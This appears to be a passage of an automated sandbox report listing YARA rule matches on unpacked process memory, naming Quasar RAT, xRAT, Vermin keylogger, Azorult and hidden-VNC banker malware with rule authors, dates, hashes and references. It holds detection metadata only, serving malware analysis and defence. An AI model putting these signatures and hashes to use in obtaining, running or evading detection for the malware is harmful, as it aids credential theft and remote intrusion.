                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                      Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_2, date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_QuasarRAT_May19_1, date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: CN_disclosed_20180208_KeyLogger_1, date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic, date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen, date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic, date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_2, date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_QuasarRAT_May19_1, date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_1, date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
